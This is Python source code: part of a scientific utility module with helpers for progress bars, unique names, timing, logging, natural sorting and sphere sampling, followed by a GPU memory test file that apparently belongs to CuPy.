or ("help" in argv)
or ("-help" in argv)
or ("--help" in argv)):
self.show_usage(argv[0])
sys.exit(2)
execenv = self.variables.copy()
execenv.update(self.constants)
for arg in argv[1:]:
_exec_arg(arg, execenv)
# check if the user set invalid keys
for added_key in (
set(execenv.keys())
- set(self.variables.keys())
- set(self.constants.keys())):
if not (added_key.startswith("user_") or added_key.startswith("_")):
raise ValueError(
f"invalid setup key: '{added_key}' "
"(user variables must start with 'user_' or '_')")
result = self.Parameters({key: execenv[key] for key in self.variables})
self.validate(result)
return result
def validate(self, setup):
pass
# }}}
# {{{ debugging
class StderrToStdout:
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.stderr_backup = sys.stderr
sys.stderr = sys.stdout
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stderr = self.stderr_backup
del self.stderr_backup
def typedump(val, max_seq=5, special_handlers=None):
if special_handlers is None:
special_handlers = {}
try:
hdlr = special_handlers[type(val)]
except KeyError:
pass
else:
return hdlr(val)
try:
len(val)
except TypeError:
return type(val).__name__
else:
if isinstance(val, dict):
return "{%s}" % (
", ".join(
f"{str(k)!r}: {typedump(v)}"
for k, v in val.items()))
try:
if len(val) > max_seq:
return "{}({},...)".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val[:max_seq]))
else:
return "{}({})".format(
type(val).__name__,
",".join(typedump(x, max_seq, special_handlers)
for x in val))
except TypeError:
return val.__class__.__name__
def invoke_editor(s, filename="edit.txt", descr="the file"):
from tempfile import mkdtemp
tempdir = mkdtemp()
from os.path import join
full_name = join(tempdir, filename)
outf = open(full_name, "w")
outf.write(str(s))
outf.close()
import os
if "EDITOR" in os.environ:
from subprocess import Popen
p = Popen([os.environ["EDITOR"], full_name])
os.waitpid(p.pid, 0)
else:
print("(Set the EDITOR environment variable to be "
"dropped directly into an editor next time.)")
input(f"Edit {descr} at {full_name} now, then hit [Enter]:")
inf = open(full_name)
result = inf.read()
inf.close()
return result
# }}}
# {{{ progress bars
class ProgressBar: # pylint: disable=too-many-instance-attributes
"""
.. automethod:: draw
.. automethod:: progress
.. automethod:: set_progress
.. automethod:: finished
.. automethod:: __enter__
.. automethod:: __exit__
"""
def __init__(self, descr, total, initial=0, length=40):
import time
self.description = descr
self.total = total
self.done = initial
self.length = length
self.last_squares = -1
self.start_time = time.time()
self.last_update_time = self.start_time
self.speed_meas_start_time = self.start_time
self.speed_meas_start_done = initial
self.time_per_step = None
def draw(self):
import time
now = time.time()
squares = int(self.done/self.total*self.length)
if squares != self.last_squares or now-self.last_update_time > 0.5:
if (self.done != self.speed_meas_start_done
and now-self.speed_meas_start_time > 3):
new_time_per_step = (now-self.speed_meas_start_time) \
/ (self.done-self.speed_meas_start_done)
if self.time_per_step is not None:
self.time_per_step = (new_time_per_step + self.time_per_step)/2
else:
self.time_per_step = new_time_per_step
self.speed_meas_start_time = now
self.speed_meas_start_done = self.done
if self.time_per_step is not None:
eta_str = "{:7.1f}s ".format(
max(0, (self.total-self.done) * self.time_per_step)
)
else:
eta_str = "?"
sys.stderr.write("{:<20} [{}] ETA {}\r".format(
self.description,
squares*"#"+(self.length-squares)*" ",
eta_str))
self.last_squares = squares
self.last_update_time = now
def progress(self, steps=1):
self.set_progress(self.done + steps)
def set_progress(self, done):
self.done = done
self.draw()
def finished(self):
self.set_progress(self.total)
sys.stderr.write("\n")
def __enter__(self):
self.draw()
def __exit__(self, exc_type, exc_val, exc_tb):
self.finished()
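# A brief usage sketch for ProgressBar (illustrative):
#
#     pb = ProgressBar("assembling", total=1000)
#     for _ in range(1000):
#         ...           # do one unit of work
#         pb.progress()
#     pb.finished()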
# }}}
# {{{ file system related
def assert_not_a_file(name):
import os
if os.access(name, os.F_OK):
raise OSError(f"file `{name}' already exists")
def add_python_path_relative_to_script(rel_path):
from os.path import dirname, join, abspath
script_name = sys.argv[0]
rel_script_dir = dirname(script_name)
sys.path.append(abspath(join(rel_script_dir, rel_path)))
# }}}
# {{{ numpy dtype mangling
def common_dtype(dtypes, default=None):
dtypes = list(dtypes)
if dtypes:
return argmax2((dtype, dtype.num) for dtype in dtypes)
else:
if default is not None:
return default
else:
raise ValueError(
"cannot find common dtype of empty dtype list")
def to_uncomplex_dtype(dtype):
import numpy as np
return np.array(1, dtype=dtype).real.dtype.type
def match_precision(dtype, dtype_to_match):
import numpy
tgt_is_double = dtype_to_match in [
numpy.float64, numpy.complex128]
dtype_is_complex = dtype.kind == "c"
if dtype_is_complex:
if tgt_is_double:
return numpy.dtype(numpy.complex128)
else:
return numpy.dtype(numpy.complex64)
else:
if tgt_is_double:
return numpy.dtype(numpy.float64)
else:
return numpy.dtype(numpy.float32)
# }}}
# {{{ unique name generation
def generate_unique_names(prefix):
yield prefix
try_num = 0
while True:
yield f"{prefix}_{try_num}"
try_num += 1
UNIQUE_NAME_GEN_COUNTER_RE = re.compile(r"^(?P<based_on>\w+)_(?P<counter>\d+)$")
def generate_numbered_unique_names(
prefix: str, num: Optional[int] = None) -> Iterable[Tuple[int, str]]:
if num is None:
yield (0, prefix)
num = 0
while True:
name = f"{prefix}_{num}"
num += 1
yield (num, name)
generate_unique_possibilities = MovedFunctionDeprecationWrapper(
generate_unique_names)
class UniqueNameGenerator:
"""
.. automethod:: is_name_conflicting
.. automethod:: add_name
.. automethod:: add_names
.. automethod:: __call__
"""
def __init__(self,
existing_names: Optional[Set[str]] = None,
forced_prefix: str = ""):
if existing_names is None:
existing_names = set()
self.existing_names = existing_names.copy()
self.forced_prefix = forced_prefix
self.prefix_to_counter: Dict[str, int] = {}
def is_name_conflicting(self, name: str) -> bool:
return name in self.existing_names
def _name_added(self, name: str) -> None:
"""Callback to alert subclasses when a name has been added.
.. note::
This will not get called for the names in the *existing_names*
argument to :meth:`__init__`.
"""
pass
def add_name(self, name: str) -> None:
if self.is_name_conflicting(name):
raise ValueError(f"name '{name}' conflicts with existing names")
if not name.startswith(self.forced_prefix):
raise ValueError(
f"name '{name}' does not start with required prefix "
f"'{self.forced_prefix}'")
self.existing_names.add(name)
self._name_added(name)
def add_names(self, names: Iterable[str]) -> None:
for name in names:
self.add_name(name)
def __call__(self, based_on: str = "id") -> str:
based_on = self.forced_prefix + based_on
counter = self.prefix_to_counter.get(based_on, None)
# {{{ try to get counter from based_on if not already present
if counter is None:
counter_match = UNIQUE_NAME_GEN_COUNTER_RE.match(based_on)
if counter_match:
based_on = counter_match.groupdict()["based_on"]
counter = int(counter_match.groupdict()["counter"])
# }}}
for counter, var_name in generate_numbered_unique_names(based_on, counter): # noqa: B007,E501
if not self.is_name_conflicting(var_name):
break
self.prefix_to_counter[based_on] = counter
var_name = intern(var_name) # pylint: disable=undefined-loop-variable
self.existing_names.add(var_name)
self._name_added(var_name)
return var_name
# }}}
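# Illustrative sketch (not part of the original module): typical use of
# UniqueNameGenerator to avoid clashes with a set of pre-existing names.
def _example_unique_name_generator():
    ung = UniqueNameGenerator(existing_names={"tmp"})
    assert ung("tmp") == "tmp_0"    # "tmp" is taken, so a counter is appended
    assert ung("tmp") == "tmp_1"
    assert ung("fresh") == "fresh"  # unused names come back unchanged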
# {{{ recursion limit
class MinRecursionLimit:
def __init__(self, min_rec_limit):
self.min_rec_limit = min_rec_limit
def __enter__(self):
# pylint: disable=attribute-defined-outside-init
self.prev_recursion_limit = sys.getrecursionlimit()
new_limit = max(self.prev_recursion_limit, self.min_rec_limit)
sys.setrecursionlimit(new_limit)
def __exit__(self, exc_type, exc_val, exc_tb):
# Deep recursion can produce deeply nested data structures
# (or long chains of to-be gc'd generators) that cannot be
# undergo garbage collection with a lower recursion limit.
#
# As a result, it doesn't seem possible to lower the recursion limit
# again after it has been raised without causing reliability issues.
#
# See https://gitlab.tiker.net/inducer/sumpy/issues/31 for
# context.
pass
# }}}
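# Illustrative sketch (not part of the original module): raise the recursion
# limit around a deeply recursive call; as noted in __exit__ above, the limit
# is deliberately not lowered again afterwards.
def _example_min_recursion_limit():
    def depth(n):
        return 0 if n == 0 else 1 + depth(n - 1)
    with MinRecursionLimit(20000):
        return depth(5000)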
# {{{ download from web if not present
def download_from_web_if_not_present(url, local_name=None):
"""
.. versionadded:: 2017.5
"""
from os.path import basename, exists
if local_name is None:
local_name = basename(url)
if not exists(local_name):
from pytools.version import VERSION_TEXT
from urllib.request import Request, urlopen
req = Request(url, headers={
"User-Agent": f"pytools/{VERSION_TEXT}"
})
with urlopen(req) as inf:
contents = inf.read()
with open(local_name, "wb") as outf:
outf.write(contents)
# }}}
# {{{ find git revisions
def find_git_revision(tree_root): # pylint: disable=too-many-locals
# Keep this routine self-contained so that it can be copy-pasted into
# setup.py.
from os.path import join, exists, abspath
tree_root = abspath(tree_root)
if not exists(join(tree_root, ".git")):
return None
# construct minimal environment
# stolen from
# https://github.com/numpy/numpy/blob/055ce3e90b50b5f9ef8cf1b8641c42e391f10735/setup.py#L70-L92
import os
env = {}
for k in ["SYSTEMROOT", "PATH", "HOME"]:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env["LANGUAGE"] = "C"
env["LANG"] = "C"
env["LC_ALL"] = "C"
from subprocess import Popen, PIPE, STDOUT
p = Popen(["git", "rev-parse", "HEAD"], shell=False,
stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True,
cwd=tree_root, env=env)
(git_rev, _) = p.communicate()
git_rev = git_rev.decode()
git_rev = git_rev.rstrip()
retcode = p.returncode
assert retcode is not None
if retcode != 0:
from warnings import warn
warn("unable to find git revision")
return None
return git_rev
def find_module_git_revision(module_file, n_levels_up):
from os.path import dirname, join
tree_root = join(*([dirname(module_file)] + [".." * n_levels_up]))
return find_git_revision(tree_root)
# }}}
# {{{ create a reshaped view of a numpy array
def reshaped_view(a, newshape):
""" Create a new view object with shape ``newshape`` without copying the data of
``a``. This function is different from ``numpy.reshape`` by raising an
exception when data copy is necessary.
:arg a: a :class:`numpy.ndarray` object.
:arg newshape: an ``int`` object or a tuple of ``int`` objects.
.. versionadded:: 2018.4
"""
newview = a.view()
newview.shape = newshape
return newview
# }}}
# {{{ process timer
SUPPORTS_PROCESS_TIME = True
class ProcessTimer:
"""Measures elapsed wall time and process time.
.. automethod:: __enter__
.. automethod:: __exit__
.. automethod:: done
Timing data attributes:
.. attribute:: wall_elapsed
.. attribute:: process_elapsed
.. versionadded:: 2018.5
"""
def __init__(self):
import time
self.perf_counter_start = time.perf_counter()
self.process_time_start = time.process_time()
self.wall_elapsed = None
self.process_elapsed = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def done(self):
import time
self.wall_elapsed = time.perf_counter() - self.perf_counter_start
self.process_elapsed = time.process_time() - self.process_time_start
def __str__(self):
cpu = self.process_elapsed / self.wall_elapsed
return f"{self.wall_elapsed:.2f}s wall {cpu:.2f}x CPU"
def __repr__(self):
wall = self.wall_elapsed
process = self.process_elapsed
return (f"{type(self).__name__}"
f"(wall_elapsed={wall!r}s, process_elapsed={process!r}s)")
# }}}
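# Illustrative sketch (not part of the original module): timing a block of
# work; wall_elapsed and process_elapsed are filled in when the block exits.
def _example_process_timer():
    with ProcessTimer() as pt:
        sum(i * i for i in range(10**6))
    return f"took {pt.wall_elapsed:.3f}s wall, {pt.process_elapsed:.3f}s CPU"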
# {{{ log utilities
class ProcessLogger: # pylint: disable=too-many-instance-attributes
"""Logs the completion time of a (presumably) lengthy process to :mod:`logging`.
Only uses a high log level if the process took perceptible time.
.. automethod:: __init__
.. automethod:: done
.. automethod:: __enter__
.. automethod:: __exit__
"""
default_noisy_level = logging.INFO
def __init__( # pylint: disable=too-many-arguments
self, logger, description,
silent_level=None, noisy_level=None, long_threshold_seconds=None):
self.logger = logger
self.description = description
self.silent_level = silent_level or logging.DEBUG
self.noisy_level = noisy_level or self.default_noisy_level
self.long_threshold_seconds = (
# 0 is a valid value that should override the default
0.3 if long_threshold_seconds is None else long_threshold_seconds)
self.logger.log(self.silent_level, "%s: start", self.description)
self.is_done = False
import threading
self.late_start_log_thread = threading.Thread(target=self._log_start_if_long)
# Do not delay interpreter exit if thread not finished.
self.late_start_log_thread.daemon = True
# https://github.com/firedrakeproject/firedrake/issues/1422
# Starting a thread may irrecoverably break various environments,
# e.g. MPI.
#
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, do not do it unless there is (weak)
# evidence of interactive use.
import sys
if sys.stdin is None:
# Can happen, e.g., if pudb is controlling the console.
use_late_start_logging = False
else:
if hasattr(sys.stdin, "closed") and not sys.stdin.closed:
# can query stdin.isatty() only if stdin's open
use_late_start_logging = sys.stdin.isatty()
else:
use_late_start_logging = False
import os
if os.environ.get("PYTOOLS_LOG_NO_THREADS", ""):
use_late_start_logging = False
if use_late_start_logging:
try:
self.late_start_log_thread.start()
except RuntimeError:
# https://github.com/firedrakeproject/firedrake/issues/1422
#
# Starting a thread may fail in various environments, e.g. MPI.
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, tolerate failures of it without
# warning.
pass
self.timer = ProcessTimer()
def _log_start_if_long(self):
from time import sleep
sleep_duration = 10*self.long_threshold_seconds
sleep(sleep_duration)
if not self.is_done:
self.logger.log(
self.noisy_level, "%s: started %.gs ago",
self.description,
sleep_duration)
def done( # pylint: disable=keyword-arg-before-vararg
self, extra_msg=None, *extra_fmt_args):
self.timer.done()
self.is_done = True
completion_level = (
self.noisy_level
if self.timer.wall_elapsed > self.long_threshold_seconds
else self.silent_level)
msg = "%s: completed (%s)"
fmt_args = [self.description, str(self.timer)]
if extra_msg:
msg = f"{msg}: {extra_msg}"
fmt_args.extend(extra_fmt_args)
self.logger.log(completion_level, msg, *fmt_args)
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
class DebugProcessLogger(ProcessLogger):
default_noisy_level = logging.DEBUG
class log_process: # noqa: N801
"""A decorator that uses :class:`ProcessLogger` to log data about calls
to the wrapped function.
.. automethod:: __init__
.. automethod:: __call__
"""
def __init__(self, logger, description=None, long_threshold_seconds=None):
self.logger = logger
self.description = description
self.long_threshold_seconds = long_threshold_seconds
def __call__(self, wrapped):
def wrapper(*args, **kwargs):
with ProcessLogger(
self.logger,
self.description or wrapped.__name__,
long_threshold_seconds=self.long_threshold_seconds):
return wrapped(*args, **kwargs)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, wrapped)
return new_wrapper
# }}}
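# Illustrative sketch (not part of the original module): decorating a function
# with log_process so its runtime is reported through the given logger.
_example_logger = logging.getLogger(__name__)

@log_process(_example_logger, "summing integers")
def _example_logged_work(n=10**6):
    return sum(range(n))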
# {{{ sorting in natural order
def natorder(item):
"""Return a key for natural order string comparison.
See :func:`natsorted`.
.. versionadded:: 2020.1
"""
import re
result = []
for (int_val, string_val) in re.findall(r"(\d+)|(\D+)", item):
if int_val:
result.append(int(int_val))
# Tie-breaker in case of leading zeros in *int_val*. Longer values
# compare smaller to preserve order of numbers in decimal notation,
# e.g., "1.001" < "1.01"
# (cf. https://github.com/sourcefrog/natsort)
result.append(-len(int_val))
else:
result.append(string_val)
return result
def natsorted(iterable, key=None, reverse=False):
"""Sort using natural order [1]_, as opposed to lexicographic order.
Example::
>>> sorted(["_10", "_1", "_9"]) == ["_1", "_10", "_9"]
True
>>> natsorted(["_10", "_1", "_9"]) == ["_1", "_9", "_10"]
True
:arg iterable: an iterable to be sorted. It must only have strings, unless
*key* is specified.
:arg key: if provided, a key function that returns strings for ordering
using natural order.
:arg reverse: if *True*, sorts in descending order.
:returns: a sorted list
.. [1] https://en.wikipedia.org/wiki/Natural_sort_order
.. versionadded:: 2020.1
"""
if key is None:
key = lambda x: x
return sorted(iterable, key=lambda y: natorder(key(y)), reverse=reverse)
# }}}
# {{{ resolve_name
# https://github.com/python/cpython/commit/1ed61617a4a6632905ad6a0b440cd2cafb8b6414
_DOTTED_WORDS = r"[a-z_]\w*(\.[a-z_]\w*)*"
_NAME_PATTERN = re.compile(f"^({_DOTTED_WORDS})(:({_DOTTED_WORDS})?)?$", re.I)
del _DOTTED_WORDS
def resolve_name(name):
"""A backport of :func:`pkgutil.resolve_name` (added in Python 3.9).
.. versionadded:: 2021.1.2
"""
# Delete the tail of the function and deprecate this once we require Python 3.9.
if sys.version_info >= (3, 9):
# use the official version
import pkgutil
return pkgutil.resolve_name(name) # pylint: disable=no-member
import importlib
m = _NAME_PATTERN.match(name)
if not m:
raise ValueError(f"invalid format: {name!r}")
groups = m.groups()
if groups[2]:
# there is a colon - a one-step import is all that's needed
mod = importlib.import_module(groups[0])
parts = groups[3].split(".") if groups[3] else []
else:
# no colon - have to iterate to find the package boundary
parts = name.split(".")
modname = parts.pop(0)
# first part *must* be a module/package.
mod = importlib.import_module(modname)
while parts:
p = parts[0]
s = f"{modname}.{p}"
try:
mod = importlib.import_module(s)
parts.pop(0)
modname = s
except ImportError:
break
# if we reach this point, mod is the module, already imported, and
# parts is the list of parts in the object hierarchy to be traversed, or
# an empty list if just the module is wanted.
result = mod
for p in parts:
result = getattr(result, p)
return result
# }}}
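# Illustrative sketch (not part of the original module): both the dotted and
# the colon-separated forms resolve to the same object.
def _example_resolve_name():
    import os
    assert resolve_name("os.path.join") is os.path.join
    assert resolve_name("os.path:join") is os.path.join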
# {{{ unordered_hash
def unordered_hash(hash_instance, iterable, hash_constructor=None):
"""Using a hash algorithm given by the parameter-less constructor
*hash_constructor*, return a hash object whose internal state
depends on the entries of *iterable*, but not their order. If *hash*
    is the instance returned by evaluating ``hash_constructor()``, then
    each entry *i* of the iterable must permit ``hash.update(i)`` to
    succeed. An example of *hash_constructor* is ``hashlib.sha256``
from :mod:`hashlib`. ``hash.digest_size`` must also be defined.
If *hash_constructor* is not provided, ``hash_instance.name`` is
used to deduce it.
:returns: the updated *hash_instance*.
.. warning::
The construction used in this function is likely not cryptographically
secure. Do not use this function in a security-relevant context.
.. versionadded:: 2021.2
"""
if hash_constructor is None:
from functools import partial
import hashlib
hash_constructor = partial(hashlib.new, hash_instance.name)
h_int = 0
for i in iterable:
h_i = hash_constructor()
h_i.update(i)
# Using sys.byteorder (for efficiency) here technically makes the
# hash system-dependent (which it should not be), however the
# effect of this is undone by the to_bytes conversion below, while
# left invariant by the intervening XOR operations (which do not
# mix adjacent bits).
h_int = h_int ^ int.from_bytes(h_i.digest(), sys.byteorder)
hash_instance.update(h_int.to_bytes(hash_instance.digest_size, sys.byteorder))
return hash_instance
# }}}
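# Illustrative sketch (not part of the original module): the resulting digest
# is independent of the order of the (bytes-like) entries.
def _example_unordered_hash():
    import hashlib
    h1 = unordered_hash(hashlib.sha256(), [b"a", b"b", b"c"])
    h2 = unordered_hash(hashlib.sha256(), [b"c", b"a", b"b"])
    assert h1.hexdigest() == h2.hexdigest()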
# {{{ sphere_sample
def sphere_sample_equidistant(npoints_approx: int, r: float = 1.0):
"""Generate points regularly distributed on a sphere
based on https://www.cmu.edu/biolphys/deserno/pdf/sphere_equi.pdf.
:returns: an :class:`~numpy.ndarray` of shape ``(3, npoints)``, where
``npoints`` does not generally equal *npoints_approx*.
"""
import numpy as np
points: List[np.ndarray] = []
count = 0
a = 4 * np.pi / npoints_approx
d = a ** 0.5
M_theta = int(np.ceil(np.pi / d)) # noqa: N806
d_theta = np.pi / M_theta
d_phi = a / d_theta
for m in range(M_theta):
theta = np.pi * (m + 0.5) / M_theta
M_phi = int(np.ceil(2 * np.pi * np.sin(theta) / d_phi)) # noqa: N806
for n in range(M_phi):
phi = 2 * np.pi * n / M_phi
points.append(np.array([
r * np.sin(theta) * np.cos(phi),
r * np.sin(theta) * np.sin(phi),
r * np.cos(theta)
]))
count += 1
# add poles
for i in range(3):
for sign in [-1, +1]:
pole = np.zeros(3)
pole[i] = r * sign
points.append(pole)
return np.array(points).T.copy()
# NOTE: each tuple contains ``(epsilon, max_npoints)``
_SPHERE_FIBONACCI_OFFSET = (
(0.33, 24), (1.33, 177), (3.33, 890),
(10, 11000), (27, 39000), (75, 600000), (214, float("inf")),
)
def sphere_sample_fibonacci(
npoints: int, r: float = 1.0, *,
optimize: Optional[str] = None):
"""Generate points on a sphere based on an offset Fibonacci lattice from [2]_.
.. [2] http://extremelearning.com.au/how-to-evenly-distribute-points-on-a-sphere-more-effectively-than-the-canonical-fibonacci-lattice/
:param optimize: takes the values: *None* to use the standard Fibonacci
lattice, ``"minimum"`` to minimize the nearest neighbor distances in the
lattice and ``"average"`` to minimize the average distances in the
lattice.
:returns: an :class:`~numpy.ndarray` of shape ``(3, npoints)``.
""" # noqa: E501
import numpy as np
if optimize is None:
epsilon = 0.5
elif optimize == "minimum":
epsilon, _ = next(o for o in _SPHERE_FIBONACCI_OFFSET if npoints < o[1])
elif optimize == "average":
epsilon = 0.36
else:
raise ValueError(f"unknown 'optimize' choice: '{optimize}'")
golden_ratio = (1 + np.sqrt(5)) / 2
n = np.arange(npoints)
phi = 2.0 * np.pi * n / golden_ratio
theta = np.arccos(1.0 - 2.0 * (n + epsilon) / (npoints + 2 * epsilon - 1))
return np.stack([
r * np.sin(theta) * np.cos(phi),
r * np.sin(theta) * np.sin(phi),
r * np.cos(theta)
])
# }}}
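# Illustrative sketch (not part of the original module): Fibonacci-lattice
# samples come back as a (3, npoints) array of points on the requested sphere.
def _example_sphere_sample():
    import numpy as np
    pts = sphere_sample_fibonacci(128, r=2.0)
    assert pts.shape == (3, 128)
    assert np.allclose((pts**2).sum(axis=0), 4.0)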
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
# vim: foldmethod=marker
|
test_memory.py
|
import ctypes
import gc
import pickle
import threading
import unittest
import fastrlock
import pytest
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
pass
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed, memory.malloc_async],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
if cupy.cuda.runtime.is_hip:
if self.allocator is memory.malloc_managed:
raise unittest.SkipTest('HIP does not support managed memory')
if self.allocator is memory.malloc_async:
raise unittest.SkipTest('HIP does not support async mempool')
elif cupy.cuda.driver.get_build_version() < 11020:
raise unittest.SkipTest('malloc_async is supported since '
'CUDA 11.2')
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
assert pval == int(memptr)
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval + 4 == int(memptr2)
memptr3 = 4 + memptr
assert isinstance(memptr3, memory.MemoryPointer)
assert pval + 4 == int(memptr3)
memptr += 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval + 4 == int(memptr)
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval == int(memptr2)
memptr -= 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval == int(memptr)
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
assert a_cpu.value == 1
a_gpu += 1
@testing.parameterize(*testing.product({
'use_streams': [True, False],
}))
@testing.gpu
class TestMemoryPointerAsync(unittest.TestCase):
def setUp(self):
self.stream = stream_module.Stream() if self.use_streams else None
def test_copy_to_and_from_host_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
def test_round_size(self):
assert memory._round_size(self.unit - 1) == self.unit
assert memory._round_size(self.unit) == self.unit
assert memory._round_size(self.unit + 1) == self.unit * 2
def test_bin_index_from_size(self):
assert memory._bin_index_from_size(self.unit - 1) == 0
assert memory._bin_index_from_size(self.unit) == 0
assert memory._bin_index_from_size(self.unit + 1) == 1
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
tail = chunk.split(self.unit * 2)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit * 2
assert chunk.prev is None
assert chunk.next.ptr() == tail.ptr()
assert chunk.stream_ident == self.stream_ident
